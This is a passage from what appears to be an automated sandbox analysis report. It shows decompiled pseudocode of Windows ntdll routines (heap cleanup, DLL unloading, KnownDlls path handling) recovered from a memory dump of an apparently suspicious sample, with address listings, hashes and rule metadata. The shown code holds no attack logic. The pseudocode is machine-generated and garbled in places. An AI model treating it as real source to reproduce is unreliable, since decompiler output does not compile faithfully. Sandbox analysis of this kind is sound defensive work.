							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E1D73FABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E1D73FABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E1D73FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E1D753C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E1D753C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E1D782F90();
								}
							}
							_t107 = E1D753C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E1D753C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E1D782F90();
							}
							if(E1D753C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E1D7FD9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                                                                              0x1d73f8b0
                                                                                                                              0x1d73f8b8
                                                                                                                              0x1d73f8c2
                                                                                                                              0x1d73f8c6
                                                                                                                              0x1d73f8c9
                                                                                                                              0x1d73f8ce
                                                                                                                              0x1d79e467
                                                                                                                              0x1d79e46e
                                                                                                                              0x1d79e474
                                                                                                                              0x1d79e47a
                                                                                                                              0x1d79e47e
                                                                                                                              0x1d79e49d
                                                                                                                              0x1d79e4a2
                                                                                                                              0x1d79e480
                                                                                                                              0x1d79e495
                                                                                                                              0x1d79e49a
                                                                                                                              0x1d79e4a8
                                                                                                                              0x1d79e4ad
                                                                                                                              0x1d79e4b2
                                                                                                                              0x1d79e4ba
                                                                                                                              0x1d79e4c2
                                                                                                                              0x1d79e4c3
                                                                                                                              0x1d79e4c3
                                                                                                                              0x1d79e4ba
                                                                                                                              0x1d73f9f6
                                                                                                                              0x1d73f9f6
                                                                                                                              0x1d73f9f8
                                                                                                                              0x1d73f9fc
                                                                                                                              0x1d73f9fd
                                                                                                                              0x1d73f9fe
                                                                                                                              0x1d73fa09
                                                                                                                              0x1d73fa09
                                                                                                                              0x1d73f8db
                                                                                                                              0x1d79e4cd
                                                                                                                              0x1d79e4d3
                                                                                                                              0x1d79e4d6
                                                                                                                              0x1d73fa37
                                                                                                                              0x1d73fa37
                                                                                                                              0x00000000
                                                                                                                              0x1d73fa37
                                                                                                                              0x1d79e4dc
                                                                                                                              0x1d79e4e1
                                                                                                                              0x1d79e4e3
                                                                                                                              0x1d79e4e9
                                                                                                                              0x1d79e4eb
                                                                                                                              0x1d79e4eb
                                                                                                                              0x1d79e4f2
                                                                                                                              0x1d79e4f9
                                                                                                                              0x1d79e504
                                                                                                                              0x1d79e505
                                                                                                                              0x1d79e50c
                                                                                                                              0x00000000
                                                                                                                              0x1d79e50c
                                                                                                                              0x1d73f8e8
                                                                                                                              0x1d79e516
                                                                                                                              0x1d79e51f
                                                                                                                              0x1d79e525
                                                                                                                              0x00000000
                                                                                                                              0x1d79e525
                                                                                                                              0x1d73f8ee
                                                                                                                              0x1d73f8ee
                                                                                                                              0x1d73f8f5
                                                                                                                              0x1d79e530
                                                                                                                              0x1d79e532
                                                                                                                              0x1d79e532
                                                                                                                              0x1d73f8fd
                                                                                                                              0x1d73f909
                                                                                                                              0x1d79e53c
                                                                                                                              0x1d79e543
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79e54b
                                                                                                                              0x1d79e550
                                                                                                                              0x1d79e552
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73f90f
                                                                                                                              0x1d73f90f
                                                                                                                              0x1d73f918
                                                                                                                              0x00000000
                                                                                                                              0x1d73f91e
                                                                                                                              0x1d73f924
                                                                                                                              0x1d73f92b
                                                                                                                              0x1d73f930
                                                                                                                              0x1d73f931
                                                                                                                              0x1d73f936
                                                                                                                              0x1d73f93c
                                                                                                                              0x1d73f93e
                                                                                                                              0x1d79e55d
                                                                                                                              0x1d79e55f
                                                                                                                              0x1d79e563
                                                                                                                              0x1d79e56a
                                                                                                                              0x1d79e578
                                                                                                                              0x1d79e57c
                                                                                                                              0x1d79e581
                                                                                                                              0x1d79e586
                                                                                                                              0x1d79e588
                                                                                                                              0x1d79e59a
                                                                                                                              0x1d79e58a
                                                                                                                              0x1d79e593
                                                                                                                              0x1d79e593
                                                                                                                              0x1d79e59f
                                                                                                                              0x1d79e5a2
                                                                                                                              0x1d79e5a8
                                                                                                                              0x1d79e5ae
                                                                                                                              0x1d79e5ae
                                                                                                                              0x1d79e5b3
                                                                                                                              0x1d79e5b3
                                                                                                                              0x1d73f94d
                                                                                                                              0x1d73fa0c
                                                                                                                              0x1d73f953
                                                                                                                              0x1d73f953
                                                                                                                              0x1d73f953
                                                                                                                              0x1d73f957
                                                                                                                              0x1d73fa17
                                                                                                                              0x1d73fa1b
                                                                                                                              0x1d73fa28
                                                                                                                              0x1d73fa2d
                                                                                                                              0x1d73fa2d
                                                                                                                              0x1d73f95d
                                                                                                                              0x1d73f965
                                                                                                                              0x1d79e5c7
                                                                                                                              0x1d79e5cc
                                                                                                                              0x1d79e5ce
                                                                                                                              0x1d79e5d3
                                                                                                                              0x1d79e5d3
                                                                                                                              0x1d73f96f
                                                                                                                              0x1d73f981
                                                                                                                              0x1d73f981
                                                                                                                              0x00000000
                                                                                                                              0x1d73f987
                                                                                                                              0x1d73f98d
                                                                                                                              0x1d73f992
                                                                                                                              0x1d73f999
                                                                                                                              0x00000000
                                                                                                                              0x1d73f99b
                                                                                                                              0x1d73f99b
                                                                                                                              0x1d73f9a0
                                                                                                                              0x1d73f9ac
                                                                                                                              0x1d79e5e3
                                                                                                                              0x1d73f9b2
                                                                                                                              0x1d73f9b2
                                                                                                                              0x1d73f9b2
                                                                                                                              0x1d73f9b7
                                                                                                                              0x1d79e5ea
                                                                                                                              0x1d79e5f0
                                                                                                                              0x1d79e5f7
                                                                                                                              0x1d79e5fd
                                                                                                                              0x1d79e602
                                                                                                                              0x1d79e604
                                                                                                                              0x1d79e60f
                                                                                                                              0x1d79e60f
                                                                                                                              0x1d79e60f
                                                                                                                              0x1d79e618
                                                                                                                              0x1d79e621
                                                                                                                              0x1d79e622
                                                                                                                              0x1d79e624
                                                                                                                              0x1d79e62c
                                                                                                                              0x1d79e62d
                                                                                                                              0x1d79e631
                                                                                                                              0x1d79e631
                                                                                                                              0x1d79e5f7
                                                                                                                              0x1d73f9bd
                                                                                                                              0x1d73f9c2
                                                                                                                              0x1d73f9ce
                                                                                                                              0x1d79e644
                                                                                                                              0x1d73f9d4
                                                                                                                              0x1d73f9d4
                                                                                                                              0x1d73f9d4
                                                                                                                              0x1d73f9d9
                                                                                                                              0x1d79e64b
                                                                                                                              0x1d79e650
                                                                                                                              0x1d79e652
                                                                                                                              0x1d79e65d
                                                                                                                              0x1d79e65d
                                                                                                                              0x1d79e65d
                                                                                                                              0x1d79e666
                                                                                                                              0x1d79e66f
                                                                                                                              0x1d79e670
                                                                                                                              0x1d79e672
                                                                                                                              0x1d79e67a
                                                                                                                              0x1d79e67b
                                                                                                                              0x1d79e67f
                                                                                                                              0x1d79e67f
                                                                                                                              0x1d73f9e6
                                                                                                                              0x1d79e692
                                                                                                                              0x1d73f9ec
                                                                                                                              0x1d73f9ec
                                                                                                                              0x1d73f9ec
                                                                                                                              0x1d73f9f4
                                                                                                                              0x1d73fa3d
                                                                                                                              0x1d73fa3d
                                                                                                                              0x00000000
                                                                                                                              0x1d73f9f4
                                                                                                                              0x1d73f999
                                                                                                                              0x1d73f918

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 3446177414-3610490719
                                                                                                                              • Opcode ID: 673291033fe22a3941e7e346990244f2b04ccb950777fdcdfb4db9028582b797
                                                                                                                              • Instruction ID: db8b30ea59b89d0138e663ebc5c19003c2ba8ffd325bcb79e91e59e2a53f714a
                                                                                                                              • Opcode Fuzzy Hash: 673291033fe22a3941e7e346990244f2b04ccb950777fdcdfb4db9028582b797
                                                                                                                              • Instruction Fuzzy Hash: 2C913C77609791FFD316CB24D884B2AF7A5BF84AB1F01445AE9848B292DB34E840C793
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D769723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 66%
                                                                                                                              			E1D769723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E1D76A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x1d8365f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1d839214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1D74FED0(0x1d8332d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x774b36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1D760C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1d8391e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E1D7498DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E1D7C85AA(_t87);
							}
						}
						__eflags =  *0x1d8337c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E1D7BE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E1D76A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x1d8332d8);
					_t50 = E1D74E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L1D752330(_t50, 0x1d836668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E1D75D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E1D7524D0(0x1d836668);
								__eflags = _v12;
								if(_v12 != 0) {
									E1D769723(_t86, 0);
								}
								_t50 = E1D753BC0( *0x1d835d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E1D769938(L1D752330(_t50, 0x1d836668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L1D769B40(_t85, _t107, _t110, 0x1d8367ac);
							_t29 = _t107 + 0x68; // -68
							L1D769B40(_t85, _t107, _t110, 0x1d8367a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E1D7524D0(0x1d836668);
						if( *0x1d835d70 != 0) {
							E1D77680F(_t107);
						}
						_t50 = E1D75D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                                                                                              0x1d769723
                                                                                                                              0x1d76972b
                                                                                                                              0x1d769736
                                                                                                                              0x1d769738
                                                                                                                              0x1d76973c
                                                                                                                              0x1d76973e
                                                                                                                              0x1d769742
                                                                                                                              0x1d769747
                                                                                                                              0x1d7697bc
                                                                                                                              0x1d7697bc
                                                                                                                              0x1d7697bc
                                                                                                                              0x1d7697bc
                                                                                                                              0x1d7697c0
                                                                                                                              0x1d7697c5
                                                                                                                              0x1d7697c5
                                                                                                                              0x1d7697cb
                                                                                                                              0x1d769900
                                                                                                                              0x1d769908
                                                                                                                              0x1d769913
                                                                                                                              0x1d769914
                                                                                                                              0x1d769916
                                                                                                                              0x1d769918
                                                                                                                              0x1d769918
                                                                                                                              0x1d7697d6
                                                                                                                              0x1d7697db
                                                                                                                              0x1d7697dd
                                                                                                                              0x1d7697dd
                                                                                                                              0x1d7697e1
                                                                                                                              0x1d7697e3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7697e5
                                                                                                                              0x1d7697e5
                                                                                                                              0x1d7697e8
                                                                                                                              0x1d7697ec
                                                                                                                              0x1d7697ee
                                                                                                                              0x1d7697f1
                                                                                                                              0x1d7697f4
                                                                                                                              0x1d7697f9
                                                                                                                              0x1d7697fb
                                                                                                                              0x1d769922
                                                                                                                              0x1d769928
                                                                                                                              0x1d769928
                                                                                                                              0x1d769803
                                                                                                                              0x1d769805
                                                                                                                              0x1d76980a
                                                                                                                              0x1d76980e
                                                                                                                              0x1d769815
                                                                                                                              0x1d7adade
                                                                                                                              0x1d7adae0
                                                                                                                              0x1d7adae0
                                                                                                                              0x1d769815
                                                                                                                              0x1d76981b
                                                                                                                              0x1d769822
                                                                                                                              0x1d7adaea
                                                                                                                              0x1d7adb04
                                                                                                                              0x1d7adb09
                                                                                                                              0x1d7adb09
                                                                                                                              0x1d769828
                                                                                                                              0x1d76982a
                                                                                                                              0x1d76982d
                                                                                                                              0x1d769836
                                                                                                                              0x1d769836
                                                                                                                              0x1d76983a
                                                                                                                              0x1d76983f
                                                                                                                              0x1d769755
                                                                                                                              0x1d769755
                                                                                                                              0x1d769755
                                                                                                                              0x1d76975a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76986e
                                                                                                                              0x1d769870
                                                                                                                              0x1d769872
                                                                                                                              0x1d76992f
                                                                                                                              0x1d769931
                                                                                                                              0x1d769878
                                                                                                                              0x1d769878
                                                                                                                              0x1d769878
                                                                                                                              0x1d769878
                                                                                                                              0x1d769878
                                                                                                                              0x1d76987c
                                                                                                                              0x1d76987e
                                                                                                                              0x00000000
                                                                                                                              0x1d769884
                                                                                                                              0x1d769889
                                                                                                                              0x1d76988e
                                                                                                                              0x1d769891
                                                                                                                              0x1d769891
                                                                                                                              0x1d769894
                                                                                                                              0x1d769897
                                                                                                                              0x1d769899
                                                                                                                              0x1d76989d
                                                                                                                              0x1d76989f
                                                                                                                              0x1d7698b1
                                                                                                                              0x1d7698b3
                                                                                                                              0x1d7698b5
                                                                                                                              0x1d7698b8
                                                                                                                              0x1d7698c0
                                                                                                                              0x1d7698c2
                                                                                                                              0x1d7698c2
                                                                                                                              0x1d7698c4
                                                                                                                              0x1d7698c4
                                                                                                                              0x1d7698cd
                                                                                                                              0x1d7698d0
                                                                                                                              0x1d7698da
                                                                                                                              0x1d7698df
                                                                                                                              0x1d7698e4
                                                                                                                              0x1d7698e8
                                                                                                                              0x1d7698e8
                                                                                                                              0x1d7698f6
                                                                                                                              0x00000000
                                                                                                                              0x1d7698f6
                                                                                                                              0x1d7698a1
                                                                                                                              0x1d7698a3
                                                                                                                              0x1d7698a3
                                                                                                                              0x1d7698a5
                                                                                                                              0x1d7698a7
                                                                                                                              0x1d7698a9
                                                                                                                              0x1d7698a9
                                                                                                                              0x1d7698ad
                                                                                                                              0x00000000
                                                                                                                              0x1d7698ad
                                                                                                                              0x1d76987e
                                                                                                                              0x1d769760
                                                                                                                              0x1d769762
                                                                                                                              0x1d76976b
                                                                                                                              0x1d7697b5
                                                                                                                              0x1d7697bb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76976d
                                                                                                                              0x1d76976d
                                                                                                                              0x1d76976d
                                                                                                                              0x1d76976f
                                                                                                                              0x1d769777
                                                                                                                              0x1d769782
                                                                                                                              0x1d76978b
                                                                                                                              0x1d769849
                                                                                                                              0x1d769852
                                                                                                                              0x1d769857
                                                                                                                              0x1d769860
                                                                                                                              0x1d769865
                                                                                                                              0x1d769865
                                                                                                                              0x1d769796
                                                                                                                              0x1d7697a2
                                                                                                                              0x1d7adb13
                                                                                                                              0x1d7adb13
                                                                                                                              0x1d7697aa
                                                                                                                              0x1d7697af
                                                                                                                              0x1d7697b1
                                                                                                                              0x00000000
                                                                                                                              0x1d76976d
                                                                                                                              0x1d76974d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d769753
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                              • API String ID: 3446177414-2283098728
                                                                                                                              • Opcode ID: 8f89729dab180298a335371d27ee407eb178222cef422ac8793cda58c8b54c48
                                                                                                                              • Instruction ID: 25bdaaea8add80bf87fba4112479bef3e69f5fbce8c52890c9c1a529a4faeae8
                                                                                                                              • Opcode Fuzzy Hash: 8f89729dab180298a335371d27ee407eb178222cef422ac8793cda58c8b54c48
                                                                                                                              • Instruction Fuzzy Hash: B0512A35604312AFE711DF38D884BB973A0BB84734F15462EE9559B2A1F730E804CBA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C98B2 Relevance: 6.8, Strings: 5, Instructions: 542COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 72%
                                                                                                                              			E1D7C98B2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				char _v528;
				short _v530;
				short _v532;
				short _v534;
				char _v536;
				char _v576;
				char* _v580;
				intOrPtr _v582;
				char _v584;
				void* _v588;
				signed short* _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				void* _v608;
				char _v612;
				char _v616;
				void* _v620;
				void* _v624;
				intOrPtr _v628;
				char* _v632;
				void* _v636;
				char _v640;
				void* _v644;
				intOrPtr _v648;
				char _v652;
				void* _v656;
				void* _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				char _v676;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v776;
				char _v784;
				char _v792;
				char _v800;
				intOrPtr _v832;
				char _v848;
				void* _v852;
				intOrPtr _v880;
				char _v912;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t258;
				void* _t272;
				short _t273;
				void* _t276;
				void* _t278;
				void* _t283;
				void* _t285;
				void* _t290;
				void* _t309;
				void* _t315;
				void* _t318;
				intOrPtr* _t322;
				void* _t325;
				void* _t326;
				void* _t342;
				void* _t344;
				void* _t346;
				intOrPtr _t347;
				intOrPtr _t348;
				void* _t360;
				void* _t367;
				short _t382;
				void* _t384;
				signed short* _t385;
				intOrPtr* _t386;
				signed int _t388;
				signed int _t390;
				void* _t399;
				signed int _t405;
				signed short* _t407;
				signed int _t410;
				intOrPtr* _t411;
				intOrPtr _t416;
				void* _t417;
				intOrPtr _t418;
				intOrPtr _t419;
				void* _t420;
				void** _t422;
				intOrPtr _t427;
				signed int _t430;
				void* _t431;
				void* _t432;

				_t406 = __edx;
				_v12 =  *0x1d83b370 ^ _t430;
				_t427 = _a12;
				_v668 = _a4;
				_t417 = 0;
				_v648 = _a8;
				_v664 = __edx;
				_v600 = _t427;
				_v608 = 0;
				_v612 = 0;
				_v596 = 0;
				_v604 = 0;
				_v588 = 0;
				_v652 = 0;
				_v616 = 0;
				E1D785050(__ecx,  &_v776, L"\\KnownDlls32");
				_v640 = 0x18;
				_v632 =  &_v776;
				_push( &_v640);
				_push(3);
				_v636 = 0;
				_push( &_v608);
				_v628 = 0x40;
				_v624 = 0;
				_v620 = 0;
				_t258 = E1D782F30();
				_t378 = _t258;
				if(_t258 >= 0) {
					E1D785050(__ecx,  &_v784, L"KnownDllPath");
					_v636 = _v608;
					_v632 =  &_v784;
					_push( &_v640);
					_push(1);
					_v640 = 0x18;
					_push( &_v612);
					_v628 = 0x40;
					_v624 = 0;
					_v620 = 0;
					_t272 = E1D783C80();
					_t378 = _t272;
					if(_t272 >= 0) {
						_t382 = 0x5c;
						_t273 = 0x3f;
						_v534 = _t273;
						_v532 = _t273;
						_v580 =  &_v528;
						_push(0);
						_push( &_v584);
						_push(_v612);
						_v536 = _t382;
						_v530 = _t382;
						_v584 = 0x2000000;
						_t276 = E1D783F90();
						_t378 = _t276;
						if(_t276 >= 0) {
							_v580 =  &_v536;
							_t278 = 8;
							_v584 = _v584 + _t278;
							_v582 = _v582 + _t278;
							E1D785050(_t382,  &_v792, "\\");
							_t283 = E1D7610D0(_t382,  &_v584,  &_v792);
							_t378 = _t283;
							if(_t283 >= 0) {
								_t285 = E1D7610D0(_t382,  &_v584, 0x1d711b98);
								_t378 = _t285;
								if(_t285 >= 0) {
									if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
										_push(0);
										_push(0);
										_v676 = _v584;
										_push(0);
										_v672 = _v580;
										_push(8);
										_push( &_v676);
										_push(0x26);
										E1D784580();
									}
									_v640 = 0x18;
									_v632 =  &_v584;
									_push( &_v576);
									_v636 = _t417;
									_push( &_v640);
									_v628 = 0x40;
									_v624 = _t417;
									_v620 = _t417;
									_t290 = E1D782D80();
									if(_t290 >= 0 || _t290 == 0xc0000043 || _t290 == 0xc0000022) {
										_push(0x60);
										_push(5);
										_push( &_v800);
										_push( &_v640);
										_push(0x100020);
										_push( &_v604);
										_t378 = E1D782CE0();
										__eflags = _t378;
										if(_t378 >= 0) {
											_push(_v604);
											_push(0x1000000);
											_push(0x10);
											_push(_t417);
											_push(_t417);
											_push(0xd);
											_push( &_v596);
											_t378 = E1D782E50();
											__eflags = _t378;
											if(_t378 >= 0) {
												_t383 = _t427 + 0xd4;
												 *(_t427 + 0xd4) = 0;
												 *((short*)(_t427 + 0xd6)) = 0x208;
												 *((intOrPtr*)(_t427 + 0xd8)) = _t427 + 0xdc;
												_v580 =  &_v528;
												_v584 = _v584 + 0xfff8;
												_v582 = _v582 + 0xfff8;
												E1D765F20(_t427 + 0xd4,  &_v584);
												_t418 =  *[fs:0x18];
												_push(2);
												_push(0x800000);
												_push(1);
												 *((intOrPtr*)(_t418 + 0x14)) = _v580;
												_push( &_v652);
												_push(0);
												_push(0);
												_push(0);
												_push( &_v588);
												_push(0xffffffff);
												_push(_v596);
												_t378 = E1D782C30();
												__eflags = _t378;
												if(_t378 < 0) {
													_t427 = _v600;
													goto L64;
												} else {
													_t309 = E1D74B920(_t383, _v588);
													_t427 = _v600;
													_t384 = _t309;
													_v644 = _t384;
													__eflags = _t384;
													if(_t384 != 0) {
														_t407 = _t427 + 0x24;
														 *(_t427 + 0x18) = _v588;
														 *((intOrPtr*)(_t427 + 0x20)) =  *((intOrPtr*)(_t384 + 0x50));
														_t385 = _t427 + 0xd4;
														 *(_t427 + 0x4c) =  *(_t427 + 0x4c) & 0x00000000;
														 *((intOrPtr*)(_t427 + 0x44)) =  *((intOrPtr*)(_t384 + 8));
														 *_t407 =  *_t385;
														 *(_t427 + 0x34) =  *(_t427 + 0x34) & 0x00000000;
														_t407[2] = _t385[2];
														_t419 =  *((intOrPtr*)(_t427 + 0x28));
														_v592 = _t407;
														_t410 = (( *_t407 & 0x0000ffff) >> 1) - 1;
														__eflags = _t410;
														_t315 = 0x5c;
														_t411 = _t419 + _t410 * 2;
														while(1) {
															__eflags = _t411 - _t419;
															if(_t411 <= _t419) {
																break;
															}
															__eflags = _t315 -  *_t411;
															if(_t315 ==  *_t411) {
																L23:
																_t416 = _t411 + 2;
																 *((intOrPtr*)(_t427 + 0x30)) = _t416;
																_t405 = _t416 - _t419 & 0xfffffffe;
																 *(_t427 + 0x2c) = ( *_v592 & 0x0000ffff) - _t405;
																 *((short*)(_t427 + 0x2e)) =  *((intOrPtr*)(_t427 + 0x26)) - _t405;
															} else {
																_t411 = _t411 - 2;
																continue;
															}
															L25:
